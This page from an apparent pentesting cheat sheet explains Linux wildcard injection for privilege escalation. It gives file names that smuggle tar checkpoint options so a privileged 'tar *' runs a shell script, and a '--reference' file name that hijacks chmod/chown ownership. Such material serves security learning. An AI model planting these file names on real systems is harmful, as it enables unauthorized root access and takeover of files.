Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Tar RCE
  • Chmod/chown Privilege Hijack

Was this helpful?

  1. Post Exploitation
  2. Linux
  3. Linux Privilege Escalation

Wildcard Injection

PreviousSymlink TrickeryNextDocker group/LXD group

Last updated 2 years ago

Was this helpful?

If you have a file named --help in the current directory and you run the command cat *, then instead of the contents of the --help file, the cat command’s help page will be printed. This is because the asterisk was replaced by --help and bash doesn’t know it’s supposed to be a file, and not a flag.

For programs which are run by a privileged user with an asterisk, and which have flags which can have dangerous results, this can lead to privesc (for example chown and tar). This vulnerability is often in found in automatic cronjobs run by the admin.

Note: The above-described vulnerability wouldn't work if the command was cat somedirectory/*, because it would expand to cat somedirectory/--help. Naming the file --help (with a space in front of the dashes) won't help, either.

Tar RCE

Write the following files to the directory where tar * is run:

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Chmod/chown Privilege Hijack

Add a file with the following filename to the directory where chmod or chown is run with an asterisk:

--reference=FILE_YOU_OWN

When the chmod or chown command is run, then all the files will be changed to have the same permissions/ownder as FILE_YOU_OWN. You will have to create a file named FILE_YOU_OWN, obviously.

PS! You can use symlinks to change ownership of external files as well.

Exploiting Wildcard for Privilege Escalation - Hacking ArticlesHacking Articles
Logo